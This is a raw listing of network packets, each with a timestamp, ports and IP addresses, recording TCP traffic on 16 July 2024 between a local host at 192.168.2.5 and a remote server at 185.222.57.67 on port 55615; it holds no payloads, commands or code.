Jul 16, 2024 19:57:25.655010939 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655030012 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.655066967 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.655119896 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655124903 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655177116 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655208111 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655217886 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655226946 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655241013 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655251026 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655255079 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.655281067 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.655297041 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655318975 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655328989 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655333042 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655333996 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.655369043 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655373096 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655405045 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.655416012 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655421972 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655446053 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.655482054 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.655503988 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655508995 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655518055 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655524969 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655529022 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655531883 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655577898 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.655638933 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655642986 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655704975 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.655846119 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655858040 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655862093 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655872107 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655885935 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655889988 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655900002 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655904055 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655910015 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.655913115 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655917883 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655921936 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655932903 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655944109 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.655966043 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655977964 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655982018 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655991077 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655994892 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656002998 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.656028986 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.656052113 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656056881 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656064987 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656084061 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.656101942 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656111956 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656128883 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.656158924 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656163931 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656173944 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656177044 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.656213045 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656218052 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656244993 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.656265020 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656270027 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656274080 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656302929 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.656344891 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.656347990 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656352997 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656387091 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656392097 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656395912 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656414032 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.656440973 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656445980 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656449080 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.656461000 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656465054 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656477928 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656496048 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656501055 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.656523943 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656528950 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656538010 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656564951 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656569004 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656620026 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656624079 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656632900 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656694889 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656698942 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656702995 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656816006 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656821012 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656876087 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656886101 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656889915 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.656996012 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657025099 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657033920 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657037973 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657074928 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657079935 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657119036 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657123089 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657167912 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657171965 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657250881 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657255888 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657258987 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657263041 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657272100 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657303095 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657306910 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657316923 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657382965 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657387972 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657397985 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657432079 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657437086 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657449007 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.657490015 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.658662081 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.659693956 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.659717083 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.659982920 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.659986973 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.659991026 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.659995079 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.659998894 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660003901 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660007954 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660012007 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660022020 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660037994 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660042048 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660049915 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660053015 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660063982 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660093069 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660096884 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660106897 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660109997 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660119057 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660123110 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660144091 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660147905 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660157919 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660212040 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660217047 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660226107 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660271883 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660342932 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660346031 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660356045 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660391092 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660439014 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660444021 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660453081 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660567999 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660573006 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660583019 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660587072 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660634995 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660639048 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660685062 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660743952 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660749912 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660753965 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660800934 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660865068 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660938978 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.660943031 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661039114 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661052942 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661062002 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661066055 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661118984 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661129951 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661302090 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661307096 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661345959 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661406040 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661410093 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661420107 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661495924 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661500931 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661521912 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661525965 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661535025 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661537886 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661549091 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661552906 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661628962 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661633968 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661637068 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661640882 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661644936 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661652088 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661655903 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661659956 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661688089 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661746025 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661750078 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661753893 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661815882 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661819935 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661828995 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661833048 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661843061 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661847115 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661851883 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661855936 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661930084 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661936045 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661946058 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.661948919 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662144899 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662149906 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662158966 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662163019 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662172079 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662175894 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662200928 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662205935 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662215948 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662221909 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662230968 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662235022 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662447929 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662457943 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662461996 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662467003 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662471056 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662480116 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662484884 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662493944 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662497997 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662508011 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662513018 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662522078 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662525892 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662535906 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662542105 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662689924 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662694931 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662703991 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662708044 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662710905 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662714958 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662725925 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662729025 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662733078 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662736893 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662746906 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662750959 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662759066 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662763119 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.662771940 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.663347006 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.663351059 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.663355112 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.663357973 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.450489998 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.453016043 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.459027052 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.459117889 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.460031986 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.466913939 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.502990961 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.815043926 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.819945097 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.819962978 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.819972038 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.819998026 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.820002079 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.820012093 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.820030928 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.820058107 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.820072889 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.820108891 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.820353031 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.820363045 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.820365906 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.820420027 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.825180054 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.825186968 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.825196028 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.825249910 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.825295925 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.825387955 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.825397968 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.825401068 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.825453997 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.869474888 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.869631052 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.900207996 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.900506973 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.905596972 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.905603886 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.905607939 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.905618906 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.905653954 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.905670881 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.905678988 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.905694962 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.905750990 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.905776024 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.905781031 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.905790091 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.905793905 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.905843019 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.905864954 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.905946970 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.905972958 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.905977011 CEST	55615	49723	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:26.906025887 CEST	49723	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:26.906126022 CEST	55615	49723	185.222.57.67	192.168.2.5
